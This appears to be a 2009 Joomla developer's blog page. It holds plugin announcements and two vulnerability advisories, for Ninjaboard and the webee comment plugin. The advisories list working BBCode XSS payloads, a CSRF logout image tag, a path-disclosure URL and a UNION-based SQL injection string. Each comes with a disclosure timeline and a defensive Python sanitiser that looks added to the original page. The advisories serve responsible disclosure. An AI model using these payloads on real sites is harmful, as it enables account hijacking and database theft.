Wednesday, 18 November 2009 22:35
JNoGuest

JNoGuest, a Joomla! plugin designed to restrict access to your Joomla! site to registered, logged-in users, is now available! This plugin redirects guests directly to the login page of either the Joomla! core or, if desired, Community Builder. It also supports selecting a single Article to be the landing page, to explain to users why they should register!

You can get this great little plugin in my shop!

Last Updated on Thursday, 19 November 2009 18:48
Tuesday, 17 November 2009 05:46

Since releasing JMyLife, I've gotten a lot of feedback from users as far as what features they would like to see in the next release. I figured I'd go ahead and start a list of the features I'd like to see make it into 1.1, even though development has not officially started.

Last Updated on Saturday, 20 February 2010 00:42
Sunday, 15 November 2009 16:40

I am proud to announce that JMyLife is now listed over at CMS Market! You can see JMyLife's listing here: JMyLife on CMS Market

Sunday, 15 November 2009 00:00

The Joomla component Ninjaboard 0.5.0beta suffers from multiple persistent XSS vulnerabilities in its BBCode implementation, as well as a minor CSRF vulnerability and a minor Path Disclosure vulnerability.

  1. XSS 1: Nested [img] Tags

    [img]http://foo.com/fake.png [img] onerror=javascript:alert(String.fromCharCode(88,83,83)) [/img] [/img]
  2. XSS 2: JavaScript links

    [url=javascript:alert('xss');]http://google.com[/url]

    Requires minimal user interaction

  3. XSS 3: CSS Injection

    [color=#ff0000;font-size:expression(document.write(String.fromCharCode(88,83,83)))]XSS[/color]
  4. XSS 4: Nested [url] Tags

    Requires minimal user interaction, displays indications of malware, but still technically exploitable.

    [url]http://google.com?[url] onmousemove=javascript:alert(String.fromCharCode(88,83,83));//[/url][/url]
  5. CSRF: [img] Tags

    [img]http://victim-site.com/index.php?option=com_user&task=logout[/img]
  6. Path Disclosure: Profile View 'id' parameter

    Passing non-numeric values for the 'id' parameter of the profile page results in a Fatal Error, which reveals the full path to components/com_ninjaboard/models/profile.php.

    index.php?option=com_ninjaboard&view=profile&id='

These issues are fixed in the latest release, and users are urged to upgrade.

Timeline

  • Vulnerabilities Discovered: 14 July 2009
  • Vendor Notified: 16 July 2009
  • Vendor Response: 16 July 2009
  • Update Available: 2009
  • Disclosure: 15 November... 2009
Last Updated on Thursday, 30 September 2010 17:37
Sunday, 15 November 2009 00:00

webee 1.1.1, a Joomla commenting plugin, suffers from multiple vulnerabilities.

  1. SQL Injection

    The 'articleId' parameter is not sanitized.

    index2.php?option=com_webeecomment&task=default&articleId=999 union select 1,2,VERSION(),4,5,6,7,8,9,10,11,12 --
  2. BBCode [color] Tag XSS

    [color=red;xss:expression(window.r?0:(alert(String.fromCharCode(88,83,83)),window.r=1))]XSS[/color]

  3. BBCode [img] Tag XSS

    [img]http://foo.com/fake.png"/onerror="alert(String.fromCharCode(88,83,83))[/img]

  4. BBCode [url] Tag XSS

    [url="/onmouseover="alert(String.fromCharCode(88,83,83))]XSS[/url]

UPDATE: webee has been updated to 1.2 as of 12 November 2009 and still suffers from SQL Injection. XSS was not tested in 1.2.
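The common root cause in both advisories above is that tag arguments ([img] sources, [url] targets, [color] values) and an integer query parameter are dropped into HTML or SQL without validation. The following is an added example written for this post, not code from Ninjaboard, webee or the author: a small BBCode renderer that refuses the shapes of the payloads shown (nested tags, javascript: links, CSS expression() values, attribute break-outs) and an integer-only coercion for the 'id'/'articleId' parameter. The tag grammar and the helper names are assumptions.

```python
import html
import re
from typing import Optional

# Absolute http(s) URLs only: javascript:/data: schemes fail, and so does any
# quote, whitespace or bracket that could break out of a generated attribute.
URL_RE = re.compile(r"^https?://[^\s\"'<>\[\]]+$", re.IGNORECASE)
# A colour is '#rrggbb' or a bare CSS name; ';' and '(' never pass, so
# 'expression(...)' and smuggled extra CSS properties are refused.
COLOR_RE = re.compile(r"^(#[0-9a-fA-F]{6}|[a-zA-Z]{1,20})$")
# One tag per match; arguments and bodies may not contain '[' or ']' (no nesting).
TAG_RE = re.compile(
    r"\[img\]([^\[\]]+)\[/img\]"
    r"|\[url(?:=([^\[\]]+))?\]([^\[\]]+)\[/url\]"
    r"|\[color=([^\[\]]+)\]([^\[\]]+)\[/color\]"
    r"|([^\[]+|\[)"
)

def esc(s: str) -> str:
    return html.escape(s, quote=True)

def safe_url(raw: str) -> Optional[str]:
    raw = raw.strip()
    return raw if URL_RE.match(raw) else None

def _render_tag(m) -> str:
    img, href, label, color, body, plain = m.groups()
    if plain is not None:  # ordinary text: escape and pass through
        return esc(plain)
    if img is not None:  # [img]src[/img]
        url = safe_url(img)
        return f'<img src="{esc(url)}">' if url else esc(m.group(0))
    if label is not None:  # [url]x[/url] or [url=x]text[/url]
        url = safe_url(href if href is not None else label)
        return f'<a href="{esc(url)}">{esc(label)}</a>' if url else esc(m.group(0))
    color = color.strip()  # [color=x]text[/color]
    if COLOR_RE.match(color):
        return f'<span style="color:{color}">{esc(body)}</span>'
    return esc(m.group(0))

def render_bbcode(text: str) -> str:
    """BBCode -> HTML. A tag whose argument fails validation is emitted as escaped
    literal text, never as markup. A valid [img] still makes the browser issue a
    GET, so the CSRF case is fixed at the logout endpoint (POST + token), not here."""
    return TAG_RE.sub(_render_tag, text)

def article_id(raw: str) -> Optional[int]:
    """Integer-only id/articleId: a UNION payload or a stray quote yields None."""
    return int(raw) if re.fullmatch(r"[0-9]+", raw) else None
```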

Timeline

  • Vulnerabilities Discovered: 4 November 2009
  • Vendor Notified: 4 November 2009
  • Vendor Notified Again: 9 November 2009
  • Vendor Response: ... 2009
  • Update Available: ... 2009
  • Disclosure: 15 November 2009
Last Updated on Thursday, 30 September 2010 17:35

The Joomla!® name is used under a limited license from Open Source Matters in the United States and other countries. Jeff Channell is not affiliated with or endorsed by Open Source Matters or the Joomla!® Project.
